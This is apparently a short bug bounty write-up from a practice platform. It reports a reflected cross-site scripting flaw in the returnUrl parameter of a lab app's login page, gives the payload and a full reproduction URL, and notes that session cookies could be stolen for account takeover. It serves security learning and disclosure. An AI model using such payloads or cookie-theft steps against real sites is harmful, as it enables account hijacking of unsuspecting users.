bugbountyhunter scope BARKER:第一滴血 反射型 XSS 報告

sec875發表於2024-08-01

https://www.bugbountyhunter.com

Report title:Reflected Cross-Site Scripting XSS
Endpoint:https://7b6ae0ae6c79-sec875.a.barker-social.com/login
Vulnerable Parameter:returnUrl
Payload:https://7b6ae0ae6c79-sec875.a.barker-social.com/login?returnUrl=%2F"><svg/onload=alert(0)>

正文
l have discovered a reflection XSS vulnerability affecting the endpoint 'login' in the parameter 'returnUrl'. The payloed requires no filter bypass and is a simple, '"><svg/onload=alert(0)>'

You can see a working proof of concept here:
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722451450/pb4gmhtotflfexb9h4v2.png)

To reproduce:
1.Go to the barker app login page, Discover the returnUrl parameter
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722451853/oytimk1jhzvk2ujc1loe.png)
2.Visit https://7b6ae0ae6c79-sec875.a.barker-social.com/login?returnUrl=%2F%22%3E%3Csvg/onload=alert(0)%3E
3.You will observe xss executes

Payload used: "><svg/onload=alert(0)>.No filtering at all.
Vulnerable parameter: returnUrl
Endpoint/URL: https://7b6ae0ae6c79-sec875.a.barker-social.com/login

lmpact:
As the sessin cookies are not protected by HTTPOnly. we can obtain these and achieve account takeover. As well as this,the CSRF token is stored the DOM which enables us to easily perform actions on behalf of the user.

相關文章